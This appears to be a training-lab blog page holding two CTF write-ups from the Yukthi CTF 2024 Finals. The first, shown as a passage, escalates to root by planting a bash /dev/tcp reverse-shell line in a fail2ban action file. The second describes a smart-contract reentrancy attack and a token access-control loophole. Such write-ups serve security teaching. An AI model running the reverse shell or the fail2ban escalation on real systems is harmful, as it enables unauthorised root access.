openssl enc -d -aes-256-cbc -in log.txt.enc -out log_decrypted.txt -pass pass:HYT989BVGljwn234hdnjn98 192.168.1.150 – – [27/Feb/2024:14:45:33 +0000] "GET /login.asp?username=admIn&password=PasSqwa0rd HTTP/1.1" 200 1745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" The decrypted log reveals login credentials admIn and PasSqwa0rd. SSH Access and Flag Retrieval: I use above the credentials to SSH into the machine and navigate to /home/callio.friend to discover the first flag. Challenge 2: Illusionary Block After the initial victory, my journey with Callio took a new turn at the illusionary block. Armed with determination, we aimed to conquer this obstacle and retrieve the diamonds from the /root directory. Exploitation Flow Investigating Sudo Privileges: To devise our strategy, I first inspected our sudo privileges, revealing a critical detail: (ALL) NOPASSWD: /usr/sbin/service fail2ban restart This discovery indicated we could manipulate the fail2ban service without entering a password, presenting a unique opportunity for exploitation. sudo -l cat /etc/fail2ban/jail.local Fail2ban Configuration Exploration: Delving into fail2ban’s configuration, I used cat /etc/fail2ban/jail.local to understand its mechanisms better and identify any potential vulnerabilities. This exploration was crucial for planning our next steps. Adjusting Fail2ban for Reverse Shell Execution: Recognizing an opportunity in the fail2ban configuration, I decided to modify its action to trigger a reverse shell back to my machine. However, the action files in /etc/fail2ban/action.d/ were protected. To circumvent this, I employed a creative workaround: cd /etc/fail2ban/action.d/ cp -r nfts-new.conf tt && mv tt nfts-new.conf This command duplicated the nfts-new.conf file, effectively changing its ownership to my user, allowing me to insert the reverse shell script. Implementing the Reverse Shell: With the file now editable, I replaced the existing ban action with a reverse shell command targeting my listener: bash -c 'bash -i >& /dev/tcp/10.0.12.15/4444 0>&1' This setup was designed to establish a backdoor into the system upon the fail2ban service’s restart. Activating the Reverse Shell: To bring our plan to fruition, I restarted the fail2ban service using our sudo privilege: sudo /usr/sbin/service fail2ban restart Concurrently, I had set up a listener on my local machine to catch the incoming reverse shell:nc -lnvp 1234 Gaining Root Access: The final step involved triggering the reverse shell by intentionally failing seven SSH login attempts, knowing fail2ban would ban the IP and execute our reverse shell script. After the seventh failed attempts, the reverse shell connected to my listener, granting me root access to the system. Retrieving the Diamonds: With root access secured, I navigated to the /root directory to claim our ultimate prize, the diamonds, symbolized by the second flag. Conclusion The “Mystic Quest” challenge in the Yukthi CTF 2024 Finals was an exhilarating experience that took us through complex scenarios, from router firmware analysis to exploiting fail2ban. Throughout this journey, I gained valuable insights into cybersecurity, including the importance of system exploration and understanding how to exploit vulnerabilities in security tools like fail2ban. …

Mystic Quest – Yukthi CTF 2024 Finals: A Journey Through Cybersecurity Challenges Read More »

Magical Ancient Yukthi CTF

Magical Ancient – Yukthi CTF 2024 Finals

Introduction In the Yukthi CTF 2024 Finals, "Magical Ancient" presents an exciting blockchain-based adventure. Participants will navigate through smart contract complexities, performing reentry attacks and exploiting contract loopholes to acquire special tokens. This challenge provides a hands-on learning experience, particularly for aspiring IT students interested in blockchain security and smart contract exploitation. Getting Started with Selfmade Ninja Labs To begin your journey with Selfmade Ninja Lab cloud lab training for aspiring students, follow these steps: Sign Up on Selfmade Ninja Labs Visit Selfmade Ninja Labs to create your account (Click here) If you don’t have an account, use Git Selfmade Ninja Sign-In to register (Click here) Activate WireGuard: Ensure WireGuard is activated for seamless access. Access the Labs: Navigate to the Selfmade Ninja Labs Dashboard Click on Machine Labs from the main dashboard. Select Your Challenge: On the left navbar, click My Lab dropdown, then select Challenge Lab. Browse the list of challenges and search for Magical Ancient. Click the Challenge button. Deploy and Start the Mission: On the top-right of the screen, click Replay the Lab to redeploy it. Click Start Mission to begin. Port Forwarding: Use the provided IP in your terminal or Visual Studio Code (VS Code) to set up port forwarding. Once done, you’re ready to start the challenge. What You Will Learn Blockchain Reentry Attack: Understand the vulnerabilities within smart contracts that allow for reentry attacks. Smart Contract Analysis: Learn how to dissect and analyze BSC (Binance Smart Chain) smart contracts to identify exploitable loopholes. Interacting with Smart Contracts: Gain practical experience using tools like Remix IDE and Metamask to interact with and exploit contracts on the blockchain. Selfmade Ninja Lab Cloud Lab Training: This challenge provides an ideal environment for aspiring IT students to refine their skills through practical, cloud-based training in blockchain and smart contract security. Challenge 1: Magic Quest Story Upon discovering the village magician’s plight, with his magical sticks locked away, you embark on a quest to recover them. The journey starts with unlocking a door using a key hidden within smart contract files. Challenge Flow Initial Discovery: An nmap scan uncovers an open port 80, revealing a website that prompts for a key. This initial discovery sets the stage for the challenges ahead, indicating the need to navigate through blockchain vulnerabilities to proceed. Based on the Nmap scan, I found that port 80 is open. I then performed port forwarding and accessed the web service on my local machine. Contract Analysis: The journey into blockchain exploitation begins with the extraction of blocksna.tar.gz, revealing two significant contracts: etherstorage.sol and attacker.sol. These contracts hint at a reentry attack scenario, a common vulnerability within smart contracts that allows for unauthorized Ether withdrawals. tar -xzvf blocksna.tar.gz Delving deeper, you utilize Remix IDE to thoroughly analyze the contracts, pinpointing the precise vulnerability that will allow for the reentry attack. This step is critical, as understanding the contract’s logic is key to crafting a successful exploitation strategy. Performing the Attack: The attack phase begins with the deployment of the EtherStorage contract. This contract acts as the target for your reentry attack, storing Ether that you aim to extract unlawfully. After deploying EtherStorage, you make an initial deposit of Ether to simulate a real-world scenario where the contract holds funds. With EtherStorage set up and funded, the next critical step involves deploying attacker.sol. This contract is designed to exploit the reentry vulnerability in EtherStorage. By feeding it the address of the EtherStorage contract, you prepare attacker.sol to interact directly with the target. The climax of the attack is reached when you execute the attack function within the attacker.sol contract, sending along 1 Ether as bait. This triggers the reentry exploit, allowing you to withdraw all the Ether contained within EtherStorage, far exceeding the initial amount sent. Successful execution of the attack not only retrieves the key 1tnettech398ytfl35tester7tech but also demonstrates the attack’s effectiveness by significantly increasing your Ether balance by 4 Ether — a clear sign of victory in the world of blockchain security. Challenge 2: Final Triumph Story With the key from the first challenge in hand, your journey to revive the old magician’s stick by securing a special coin from the blockchain network begins. Challenge Flow Website Interaction: You’re greeted by a webpage that features two crucial buttons: "Connect to Metamask" and "Check Balance," setting the stage for your task. Setting up the BSC Testnet in Metamask: Before proceeding, you ensure your Metamask is configured for the BSC testnet, enabling transactions and interactions with the contract. Acquiring Test BNB: To engage with the contract, you acquire Test BNB from a faucet, providing the necessary funds for transactions. Connect to BSC Testnet RPC URL: Open this URL in your browser: BSC Testnet Chain Connect your wallet using your Metamask account by following the instructions on the page. Now, your account is connected to the BSC Testnet. Accessing the Token Contract: With Metamask ready and Test BNB in hand, you navigate to the specified token address on BSC Scan, initiating your contract analysis. Analyzing the Contract: A thorough examination of the contract functionalities on BSC Scan uncovers a loophole for acquiring SNA tokens, pivotal for advancing in your quest. Exploiting the User Function: To buy tokens, you discover the need to be an addedUser. Successfully exploiting the User function with your address and a 3-digit even number, you’re added as an authorized user. Buying SNA Tokens: As an addedUser, you interact with the buyToken function to purchase SNA tokens, a crucial step towards your goal. Verifying Token Acquisition: Returning to the initial webpage, you verify your SNA token balance, confirming the successful acquisition of the tokens and, consequently, the restoration of magical power to the magician’s stick. Conclusion The “Final Triumph” challenge concludes with the restoration of the magician’s stick, demonstrating the participant’s ability to navigate complex blockchain interactions and exploit smart contract vulnerabilities. This challenge highlights the value of Selfmade Ninja Lab cloud lab training for aspiring IT students, offering practical training in blockchain security …

Magical Ancient – Yukthi CTF 2024 Finals Read More »

Scroll to Top